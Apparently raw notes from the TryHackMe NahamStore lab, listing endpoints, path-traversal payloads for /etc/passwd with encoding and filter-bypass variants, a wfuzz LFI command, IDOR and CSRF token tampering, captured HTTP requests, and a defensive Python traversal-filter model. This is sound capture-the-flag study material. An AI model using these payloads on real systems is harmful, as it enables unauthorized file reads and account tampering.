nahamstore
Nahamsec's bug bounty Udemy course is great, and there's also a room on THM.
// nahamstore endpoints discovered and possible attacks
curl -X POST "http://nahamstore-2020-dev.nahamstore.thm/api/customers/" -H "Content-Type: application/json" -d "{\"customer_id\":\"1\"}"
http://marketing.nahamstore.thm/?error=
http://nahamstore.thm/product/picture/?file=.../.../.../etc/passwd
http://nahamstore.thm/account/orders/5
http://marketing.nahamstore.thm/09c2afcff60bb4dd3af7c5c5d74a482f
http://nahamstore.thm/staff
http://nahamstore.thm/basket?deleteid=1
http://nahamstore.thm/account/addressbook?redirect_url=/basket
http://nahamstore.thm/account/addressbook/?delete_address_id=6
http://nahamstore.thm/returns/2?auth=../../lfi/flag.txt
http://nahamstore-2020-dev.nahamstore.thm/api/customers/
===================================================================
POST /login?redirect_url=/orders HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/login?redirect_url=/orders
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Connection: close
Cookie: token=ba9cb3780122efab870aad3e2bf35c73; session=931d2ee7aa3c54fdac481150bdff3ef1
Upgrade-Insecure-Requests: 1
login_email=test%40test.com&login_password=test123
======================================================================================
wfuzz -c -w ./lfi-include.txt --hw 0 http://nahamstore.thm/product/picture/?file=../../../../../../../FUZZ
wfuzz
http://nahamstore.thm/product/picture/?file=
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..././..././..././..././..././..././..././..././etc/passwd
Content-Disposition: form-data; name="timesheet"; filename="file_example_XLS_10.xls"
Content-Type: application/vnd.ms-excel
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
Content-Disposition: form-data; name="timesheet"; filename="time.xlsx"
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
%2e%2e%2f%2e%2e%2fetc%2fpasswd
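The `%2e%2e%2f` and `..././` forms above are the standard probes for a filter that removes `../` from the raw parameter in a single pass. As an added example (not from the room or the course), this Python models that weak filter beside a hardened resolver; `BASE`, the sample names and the single-pass filter model are constructed assumptions:

```python
import posixpath
from urllib.parse import unquote

BASE = "/var/www/pictures"  # assumed document root for product pictures

# Constructed inputs: the traversal forms from the notes plus two benign names.
SAMPLES = [
    "../../../../etc/passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "..././..././..././..././etc/passwd",
    "logo.png",
    "products/1.jpg",
]

def escapes_base(path: str, base: str = BASE) -> bool:
    """True when a resolved path lies outside the intended directory."""
    return path != base and not path.startswith(base + "/")

def naive_resolve(raw: str, base: str = BASE) -> str:
    """Weak model: strip '../' from the raw parameter once, then decode and join.
    str.replace removes each '../' in one pass, so '..././' collapses to '../',
    and an encoded '%2e%2e%2f' is never seen by the filter at all."""
    cleaned = raw.replace("../", "")
    return posixpath.normpath(posixpath.join(base, unquote(cleaned)))

def fully_decode(raw: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so nested
    encoding cannot smuggle separators past the containment check."""
    for _ in range(rounds):
        decoded = unquote(raw)
        if decoded == raw:
            return raw
        raw = decoded
    return raw

def hardened_resolve(raw: str, base: str = BASE):
    """Decode, normalise, then verify containment on the final path.
    Returns the resolved path, or None when the request must be refused."""
    name = fully_decode(raw)
    if not name or "\x00" in name or name.startswith("/"):
        return None
    resolved = posixpath.normpath(posixpath.join(base, name))
    return None if escapes_base(resolved, base) else resolved

def compare(samples=SAMPLES):
    """Map each sample to (does the naive path escape base?, hardened result)."""
    return {s: (escapes_base(naive_resolve(s)), hardened_resolve(s)) for s in samples}

if __name__ == "__main__":
    for sample, (naive_escape, hardened) in compare().items():
        print(sample, "naive_escape=", naive_escape, "hardened=", hardened)
```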
Order does not belong to this user_id
==========================================
Additional captured requests:
GET / HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/account/settings
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1
=====================================
POST /product?id=1 HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/product?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1
add_to_basket=1&discount=123456
===============================================
GET /product?id=1&added=1 HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/product?id=1
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1
----------------------------------------------------
POST /account/addressbook?redirect_url=/basket HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/account/addressbook?redirect_url=/basket
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1
new_address_title=Mr&new_address_fname=Test&new_address_lname=tester&new_address_line1=123+sesame+street&new_address_line2=sesame+building&new_address_line3=spokane&new_address_state=washington&new_address_zipcode=54321
-----------------------------------------------------------------------------------
POST /basket HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/basket
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1
address_id=5
order 5
http://nahamstore.thm/account/orders/5
$120
action=disable&csrf_disable_protect=Ng%3D%3D
Ng== (base64 decoded): 6
NQ%3D%3D (base64 decoded): 5
POST /account/settings/disable HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/account/settings/disable
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Connection: close
Cookie: session=57ddd41373b98c9c03fe7a8d7f0daf28; token=54dfc1f9ee290de7a3342d03cf816e2d
Upgrade-Insecure-Requests: 1
action=disable&csrf_disable_protect=MTA%3D
POST /basket HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/basket
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Connection: close
Cookie: session=57ddd41373b98c9c03fe7a8d7f0daf28; token=fb15f2cedf08b171dcc0c1c5aac4919d
Upgrade-Insecure-Requests: 1
address_id=5&card_no=1234123412341234